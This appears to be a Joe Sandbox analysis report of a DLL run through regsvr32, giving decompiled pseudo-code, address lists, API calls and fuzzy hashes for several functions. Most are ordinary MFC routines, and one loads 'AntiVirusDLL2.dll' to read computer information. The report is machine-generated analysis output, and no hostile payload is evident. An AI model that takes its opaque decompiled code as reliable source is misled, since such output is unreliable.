                                                                                                                0x1001c964
                                                                                                                0x1001c96b
                                                                                                                0x1001c96e
                                                                                                                0x1001c975
                                                                                                                0x1001c981
                                                                                                                0x1001c981
                                                                                                                0x1001c981
                                                                                                                0x1001c988
                                                                                                                0x1001c98b
                                                                                                                0x1001c992
                                                                                                                0x1001c99e
                                                                                                                0x1001c99e
                                                                                                                0x1001c99e
                                                                                                                0x1001c9a5
                                                                                                                0x1001c9a8
                                                                                                                0x1001c9af
                                                                                                                0x1001c9bb
                                                                                                                0x1001c9bb
                                                                                                                0x1001c9bb
                                                                                                                0x1001c9c2
                                                                                                                0x1001c9c5
                                                                                                                0x1001c9cc
                                                                                                                0x1001c9d4
                                                                                                                0x1001c9d4
                                                                                                                0x1001c9d4
                                                                                                                0x1001c9db
                                                                                                                0x1001c9de
                                                                                                                0x1001c9e5
                                                                                                                0x1001c9ed
                                                                                                                0x1001c9ed
                                                                                                                0x1001c9ed
                                                                                                                0x1001c9f4
                                                                                                                0x1001c9f7
                                                                                                                0x1001c9fe
                                                                                                                0x1001ca0a
                                                                                                                0x1001ca0a
                                                                                                                0x1001ca0a
                                                                                                                0x1001ca11
                                                                                                                0x1001ca14
                                                                                                                0x1001ca1b
                                                                                                                0x1001ca27
                                                                                                                0x1001ca27
                                                                                                                0x1001ca27
                                                                                                                0x1001ca2e
                                                                                                                0x1001ca31
                                                                                                                0x1001ca38
                                                                                                                0x1001ca40
                                                                                                                0x1001ca40
                                                                                                                0x1001ca40
                                                                                                                0x1001ca42
                                                                                                                0x1001ca45
                                                                                                                0x1001ca48
                                                                                                                0x1001ca54
                                                                                                                0x1001ca56
                                                                                                                0x1001ca5b
                                                                                                                0x1001ca5e
                                                                                                                0x1001ca5e
                                                                                                                0x1001ca5e
                                                                                                                0x1001ca6d
                                                                                                                0x1001ca6f
                                                                                                                0x1001ca6f
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                • API String ID: 2102423945-4122032997
                                                                                                                • Opcode ID: f932c1b7ce0b4267c1d03a4bea49264083c1c03100e8a0be53e4328e5d00bddf
                                                                                                                • Instruction ID: 4907c9203e9ab577a0b3114e4bbff15b9c8914df1d523b573cf867939d06b478
                                                                                                                • Opcode Fuzzy Hash: f932c1b7ce0b4267c1d03a4bea49264083c1c03100e8a0be53e4328e5d00bddf
                                                                                                                • Instruction Fuzzy Hash: 6F81ECB5D0025DBEDB41CFA4C585BDEBBE8EF09384F118165E909EA181EB74DA84CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10011BF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10011BF0(struct HWND__* __ecx, signed int _a4, char _a8) {
				intOrPtr _v0;
				int _v4;
				char _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				void* _v56;
				struct HWND__* _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				void* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t53;
				signed int _t56;
				intOrPtr* _t65;
				void* _t72;
				intOrPtr* _t79;
				intOrPtr* _t87;
				intOrPtr _t89;
				long _t108;
				struct HWND__* _t117;
				int _t119;
				intOrPtr _t121;
				void* _t124;
				signed int _t125;

				_t91 = __ecx;
				_push(0xffffffff);
				_push(E10052178);
				_push( *[fs:0x0]);
				_t125 = _t124 - 0x24;
				_push(_t87);
				_push(_t122);
				_push(_t119);
				_t53 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t53 ^ _t125);
				 *[fs:0x0] =  &_v12;
				_t117 = __ecx;
				_t56 = _a4;
				if(_t56 < 0 || _t56 >=  *((intOrPtr*)(__ecx + 0x5c))) {
					L8:
					E1001729E(_t87, _t91, _t117, _t119, _t133);
					goto L9;
				} else {
					_t121 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x58)) + _t56 * 4));
					_v32 = _t121;
					SendMessageA( *(__ecx + 0x90), 0x1009, 0, 0);
					_t65 = E100119E0(_t117,  &_v48);
					if( *((intOrPtr*)(_t121 + 0x68)) <= 0) {
						L11:
						 *[fs:0x0] = _v16;
						return _t65;
					}
					_t87 =  *((intOrPtr*)(_t121 + 0x60));
					_t72 = E10001080(_t87,  *((intOrPtr*)(_t87 + 8)) - 0x10);
					_t125 = _t125 + 4;
					_a4 = _t72 + 0x10;
					_v4 = 0;
					E100119E0(_t117,  &_v28);
					_t119 = 0;
					_t122 = _t117 + 0x70;
					E10026562(_t117 + 0x70, 3, 0, _v0, 0, 0, 0, 0);
					_v80 =  *((intOrPtr*)(_t117 + 0x6c));
					_v76 = 0x19;
					_t91 =  *(_t117 + 0x90);
					SendMessageA( *(_t117 + 0x90), 0x1031, 0,  &_v80);
					if(_t87 ==  *((intOrPtr*)(_v64 + 0x64))) {
						L7:
						_t133 = _t87;
						if(_t87 != 0) {
							L9:
							_push(_t87 + 8);
							E10001FF0( &_a4);
							_t89 = _v0;
							E10026562(_t122, 3, _t119, _t89, 0, 0, _t119, 0);
							_t108 =  &_v60;
							_v56 = 0x19 + _t119 * 0x46;
							_v60 =  *((intOrPtr*)(_t117 + 0x6c));
							SendMessageA( *(_t117 + 0x90), 0x1031, _t119, _t108);
							_t65 = _t89 - 0x10;
							_v36 = 0xffffffff;
							asm("lock xadd [ecx], edx");
							if((_t108 | 0xffffffff) - 1 <= 0) {
								_t65 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t65)) + 4))))(_t65);
							}
							goto L11;
						}
						goto L8;
					}
					_v44 = 0x19;
					while(1) {
						_t79 = _t87;
						if(_t87 == 0) {
							goto L8;
						}
						_t87 =  *_t87;
						_push(_t79 + 8);
						E10001FF0( &_a8);
						E10026562(_t122, 3, _t119, _a4, 0, 0, _t119, 0);
						_v56 =  *((intOrPtr*)(_t117 + 0x6c));
						_v52 = _v76;
						SendMessageA( *(_t117 + 0x90), 0x1031, _t119,  &_v56);
						_t91 = _v60;
						_v76 = _v76 + 0x46;
						_t119 = _t119 + 1;
						if(_t87 !=  *((intOrPtr*)(_v60 + 0x64))) {
							continue;
						}
						goto L7;
					}
					goto L8;
				}
			}



































                                                                                                                0x10011bf0
                                                                                                                0x10011bf0
                                                                                                                0x10011bf2
                                                                                                                0x10011bfd
                                                                                                                0x10011bfe
                                                                                                                0x10011c01
                                                                                                                0x10011c02
                                                                                                                0x10011c03
                                                                                                                0x10011c05
                                                                                                                0x10011c0c
                                                                                                                0x10011c11
                                                                                                                0x10011c17
                                                                                                                0x10011c19
                                                                                                                0x10011c1f
                                                                                                                0x10011d4c
                                                                                                                0x10011d4c
                                                                                                                0x00000000
                                                                                                                0x10011c2e
                                                                                                                0x10011c37
                                                                                                                0x10011c47
                                                                                                                0x10011c4b
                                                                                                                0x10011c58
                                                                                                                0x10011c61
                                                                                                                0x10011dc3
                                                                                                                0x10011dc7
                                                                                                                0x10011dd6
                                                                                                                0x10011dd6
                                                                                                                0x10011c67
                                                                                                                0x10011c71
                                                                                                                0x10011c79
                                                                                                                0x10011c7c
                                                                                                                0x10011c87
                                                                                                                0x10011c8f
                                                                                                                0x10011c98
                                                                                                                0x10011ca0
                                                                                                                0x10011ca7
                                                                                                                0x10011caf
                                                                                                                0x10011cbe
                                                                                                                0x10011cc2
                                                                                                                0x10011cce
                                                                                                                0x10011cdb
                                                                                                                0x10011d48
                                                                                                                0x10011d48
                                                                                                                0x10011d4a
                                                                                                                0x10011d51
                                                                                                                0x10011d54
                                                                                                                0x10011d59
                                                                                                                0x10011d5e
                                                                                                                0x10011d6f
                                                                                                                0x10011d7c
                                                                                                                0x10011d85
                                                                                                                0x10011d95
                                                                                                                0x10011d99
                                                                                                                0x10011d9f
                                                                                                                0x10011da2
                                                                                                                0x10011db0
                                                                                                                0x10011db7
                                                                                                                0x10011dc1
                                                                                                                0x10011dc1
                                                                                                                0x00000000
                                                                                                                0x10011db7
                                                                                                                0x00000000
                                                                                                                0x10011d4a
                                                                                                                0x10011cdd
                                                                                                                0x10011ce5
                                                                                                                0x10011ce7
                                                                                                                0x10011ce9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10011ceb
                                                                                                                0x10011cf0
                                                                                                                0x10011cf5
                                                                                                                0x10011d0b
                                                                                                                0x10011d1d
                                                                                                                0x10011d2d
                                                                                                                0x10011d31
                                                                                                                0x10011d37
                                                                                                                0x10011d3b
                                                                                                                0x10011d40
                                                                                                                0x10011d46
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10011d46
                                                                                                                0x00000000
                                                                                                                0x10011ce5

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 10011C4B
                                                                                                                  • Part of subcall function 100119E0: GetClientRect.USER32 ref: 10011A01
                                                                                                                  • Part of subcall function 10026562: SendMessageA.USER32 ref: 100265A4
                                                                                                                • SendMessageA.USER32 ref: 10011CCE
                                                                                                                • SendMessageA.USER32 ref: 10011D31
                                                                                                                • SendMessageA.USER32 ref: 10011D99
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientRect
                                                                                                                • String ID: F
                                                                                                                • API String ID: 1925248871-1304234792
                                                                                                                • Opcode ID: 5cb2d2996ae3434bbea0c72a42839cc5b4d5cb078a5cab3b0e9bb9ff3c620ca5
                                                                                                                • Instruction ID: 568477cb1e40003779f35a6a40b397248b4cfca5fcb394985c4b3b7345751374
                                                                                                                • Opcode Fuzzy Hash: 5cb2d2996ae3434bbea0c72a42839cc5b4d5cb078a5cab3b0e9bb9ff3c620ca5
                                                                                                                • Instruction Fuzzy Hash: 32515571204701ABD318CB28CC81F9BBBE9FF897A4F000A1DF5499B291DB71E944CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10015908 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __localtime64_s
                                                                                                                • String ID: %d:%d:%d
                                                                                                                • API String ID: 773316593-941173414
                                                                                                                • Opcode ID: 80b10172bbff392484409e4a6da1d6d51d0a31f379ca35abf7c82bb4f9f553e0
                                                                                                                • Instruction ID: 38e57b7cdc0de5d0741937d4f70076225911ce1920d44c3b36a1ef4624a2621f
                                                                                                                • Opcode Fuzzy Hash: 80b10172bbff392484409e4a6da1d6d51d0a31f379ca35abf7c82bb4f9f553e0
                                                                                                                • Instruction Fuzzy Hash: 80519D312446409BD324CB248C52F9BB3E5EF89725F144A1CE9999F2D2E772E908CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100351D3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E100351D3(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E10035035(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E10035060(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E1003D1D0(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E1000B190(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E1000B190(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E1003B437(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}



























                                                                                                                0x100351d3
                                                                                                                0x100351d3
                                                                                                                0x100351d3
                                                                                                                0x100351d9
                                                                                                                0x100351e0
                                                                                                                0x100351e7
                                                                                                                0x100351ed
                                                                                                                0x100351f0
                                                                                                                0x100351f9
                                                                                                                0x100351fa
                                                                                                                0x10035203
                                                                                                                0x10035211
                                                                                                                0x10035214
                                                                                                                0x1003521c
                                                                                                                0x10035232
                                                                                                                0x10035234
                                                                                                                0x10035237
                                                                                                                0x1003523f
                                                                                                                0x10035239
                                                                                                                0x10035239
                                                                                                                0x10035239
                                                                                                                0x1003524e
                                                                                                                0x100352cc
                                                                                                                0x100352cc
                                                                                                                0x10035250
                                                                                                                0x10035265
                                                                                                                0x1003526a
                                                                                                                0x1003526d
                                                                                                                0x00000000
                                                                                                                0x1003526f
                                                                                                                0x10035270
                                                                                                                0x10035276
                                                                                                                0x1003527b
                                                                                                                0x1003527d
                                                                                                                0x10035283
                                                                                                                0x10035288
                                                                                                                0x1003528c
                                                                                                                0x1003528c
                                                                                                                0x10035290
                                                                                                                0x10035294
                                                                                                                0x10035297
                                                                                                                0x1003529b
                                                                                                                0x1003529e
                                                                                                                0x100352a5
                                                                                                                0x100352a8
                                                                                                                0x100352b0
                                                                                                                0x100352aa
                                                                                                                0x100352aa
                                                                                                                0x100352aa
                                                                                                                0x100352b7
                                                                                                                0x100352dc
                                                                                                                0x100352e3
                                                                                                                0x100352ec
                                                                                                                0x100352f4
                                                                                                                0x10035301
                                                                                                                0x10035304
                                                                                                                0x1003530a
                                                                                                                0x10035310
                                                                                                                0x100352be
                                                                                                                0x100352be
                                                                                                                0x100352c5
                                                                                                                0x100352ca
                                                                                                                0x100352d4
                                                                                                                0x100352d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100352ca
                                                                                                                0x100352b7
                                                                                                                0x1003526d
                                                                                                                0x10035311
                                                                                                                0x10035312
                                                                                                                0x100351f2
                                                                                                                0x100351f2
                                                                                                                0x100351f2
                                                                                                                0x1003531f

                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 100351FD
                                                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 10035245
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020,?,00000000), ref: 1003525F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                • String ID: @
                                                                                                                • API String ID: 1529587224-2766056989
                                                                                                                • Opcode ID: 49f461298e0e4ba3214956fe4e7bcdc5e4cfc2ed037265dc52bd360cf4ee4902
                                                                                                                • Instruction ID: 480a5723c4f33fc57dea96c9df4a7e33eb7f386d0a1c258711ad15b4c868c559
                                                                                                                • Opcode Fuzzy Hash: 49f461298e0e4ba3214956fe4e7bcdc5e4cfc2ed037265dc52bd360cf4ee4902
                                                                                                                • Instruction Fuzzy Hash: 79411271900219DFDB05DFE4CC85A9EBBB5FF04352F20822AE411EF2A5E775A945CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001E4B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1001E4B4(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_push(0x20);
				E1003D24F(E100531FE, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1005ad94;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E1002DA4D(_t59, _t59 + 0x24, _t75);
						E1002C404(_t59 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E1002C5B4(_t59, 0x1005f994) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E1002E1CB(_t59 + 0x40);
						 *(_t77 - 4) = 0;
						E1002DC22(_t59, _t59 + 0x24, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						E1001CE74(_t59);
						return E1003D2D2(_t59, _t75, _t76);
					}
					_t75 = _t59 + 0x40;
					do {
						_t76 = E1002E112(_t59, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							E1001DC2C(_t76);
							_push(_t76);
							E100160E7(_t59, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E100182A6(_t77 - 0x24)));
						if(_t76 != 0) {
							_t54 =  *((intOrPtr*)(_t76 + 4));
							if(_t54 != 0) {
								_t82 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E1002E143(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									E1001DC2C(_t76);
									_push(_t76);
									E100160E7(_t59, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}










                                                                                                                0x1001e4b4
                                                                                                                0x1001e4b4
                                                                                                                0x1001e4b4
                                                                                                                0x1001e4bb
                                                                                                                0x1001e4c0
                                                                                                                0x1001e4c2
                                                                                                                0x1001e4c5
                                                                                                                0x1001e4cb
                                                                                                                0x1001e4d0
                                                                                                                0x1001e4d7
                                                                                                                0x1001e4da
                                                                                                                0x1001e522
                                                                                                                0x1001e526
                                                                                                                0x1001e54c
                                                                                                                0x1001e54f
                                                                                                                0x1001e558
                                                                                                                0x1001e55d
                                                                                                                0x1001e564
                                                                                                                0x1001e573
                                                                                                                0x1001e575
                                                                                                                0x1001e57a
                                                                                                                0x1001e57d
                                                                                                                0x1001e57e
                                                                                                                0x1001e57f
                                                                                                                0x1001e585
                                                                                                                0x1001e586
                                                                                                                0x1001e58e
                                                                                                                0x1001e596
                                                                                                                0x1001e59e
                                                                                                                0x1001e5a3
                                                                                                                0x1001e5a5
                                                                                                                0x1001e59e
                                                                                                                0x1001e5a6
                                                                                                                0x1001e5ac
                                                                                                                0x1001e5ac
                                                                                                                0x1001e5b2
                                                                                                                0x1001e5b6
                                                                                                                0x1001e5be
                                                                                                                0x1001e5c2
                                                                                                                0x1001e5c7
                                                                                                                0x1001e5cd
                                                                                                                0x1001e5d7
                                                                                                                0x1001e5d7
                                                                                                                0x1001e528
                                                                                                                0x1001e52b
                                                                                                                0x1001e532
                                                                                                                0x1001e534
                                                                                                                0x1001e536
                                                                                                                0x1001e53a
                                                                                                                0x1001e53f
                                                                                                                0x1001e540
                                                                                                                0x1001e545
                                                                                                                0x1001e546
                                                                                                                0x00000000
                                                                                                                0x1001e4dc
                                                                                                                0x1001e4dc
                                                                                                                0x1001e4df
                                                                                                                0x1001e4df
                                                                                                                0x1001e4ed
                                                                                                                0x1001e4f1
                                                                                                                0x1001e4f3
                                                                                                                0x1001e4f8
                                                                                                                0x1001e4fa
                                                                                                                0x1001e501
                                                                                                                0x1001e508
                                                                                                                0x1001e50f
                                                                                                                0x1001e514
                                                                                                                0x1001e515
                                                                                                                0x1001e51a
                                                                                                                0x1001e501
                                                                                                                0x1001e4f8
                                                                                                                0x1001e51b
                                                                                                                0x1001e51e
                                                                                                                0x00000000
                                                                                                                0x1001e4df

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1001E4BB
                                                                                                                • GetModuleHandleA.KERNEL32(?,1005F994,00000000,?), ref: 1001E586
                                                                                                                • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 1001E596
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                • API String ID: 2418878492-2500072749
                                                                                                                • Opcode ID: ca376fa0ef1207964393a979f59780725c108ec9f3920f44291128dbebe2ad6a
                                                                                                                • Instruction ID: 913035a3e460062c6a8b571bffe7378fb7edafbc90b49d1b1ae7eaca53a4f5ad
                                                                                                                • Opcode Fuzzy Hash: ca376fa0ef1207964393a979f59780725c108ec9f3920f44291128dbebe2ad6a
                                                                                                                • Instruction Fuzzy Hash: B8316D74A00655DBCB15EFA0C885BAD77A6EF48344F410469E901AF282EB74EE84CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100027E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E100027E0(void* __ecx, void* __esi, void* __eflags) {
				void* __ebx;
				void* __edi;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t41;
				void* _t59;

				_t59 = __ecx;
				E10021017(__ecx, __ecx);
				_t41 = LoadLibraryA("dll//AntiVirusDLL2.dll");
				_t65 = _t41;
				if(_t41 != 0) {
					_t10 = GetProcAddress(_t41, "GetComputerInfo");
					__eflags = _t10;
					if(__eflags != 0) {
						_t61 =  *_t10(__esi);
						FreeLibrary(_t41);
						E1001D2C4(E1001D1C2(_t59, 0x408),  *_t11);
						E1001D2C4(E1001D1C2(_t59, 0x409),  *((intOrPtr*)(_t11 + 0x14)));
						E1001D2C4(E1001D1C2(_t59, 0x40a),  *((intOrPtr*)(_t61 + 0x10)));
						E1001D2C4(E1001D1C2(_t59, 0x40b),  *((intOrPtr*)(_t61 + 4)));
						E1001D2C4(E1001D1C2(_t59, 0x40c),  *((intOrPtr*)(_t61 + 8)));
						E1001D2C4(E1001D1C2(_t59, 0x40d),  *((intOrPtr*)(_t61 + 0xc)));
						E1001D2C4(E1001D1C2(_t59, 0x40e),  *((intOrPtr*)(_t61 + 0x18)));
						E1001D2C4(E1001D1C2(_t59, 0x40f),  *((intOrPtr*)(_t61 + 0x1c)));
						return 1;
					} else {
						E1002181C(_t41, _t59, __esi, __eflags, 0x10056ae0, _t10, _t10);
						__eflags = 0;
						return 0;
					}
				} else {
					E1002181C(_t41, _t59, __esi, _t65, 0x10056b08, _t9, _t9);
					return 0;
				}
			}








                                                                                                                0x100027e2
                                                                                                                0x100027e4
                                                                                                                0x100027f4
                                                                                                                0x100027f6
                                                                                                                0x100027f8
                                                                                                                0x10002811
                                                                                                                0x10002817
                                                                                                                0x10002819
                                                                                                                0x10002830
                                                                                                                0x10002832
                                                                                                                0x10002849
                                                                                                                0x10002860
                                                                                                                0x10002877
                                                                                                                0x1000288e
                                                                                                                0x100028a5
                                                                                                                0x100028bc
                                                                                                                0x100028d3
                                                                                                                0x100028ea
                                                                                                                0x100028f7
                                                                                                                0x1000281b
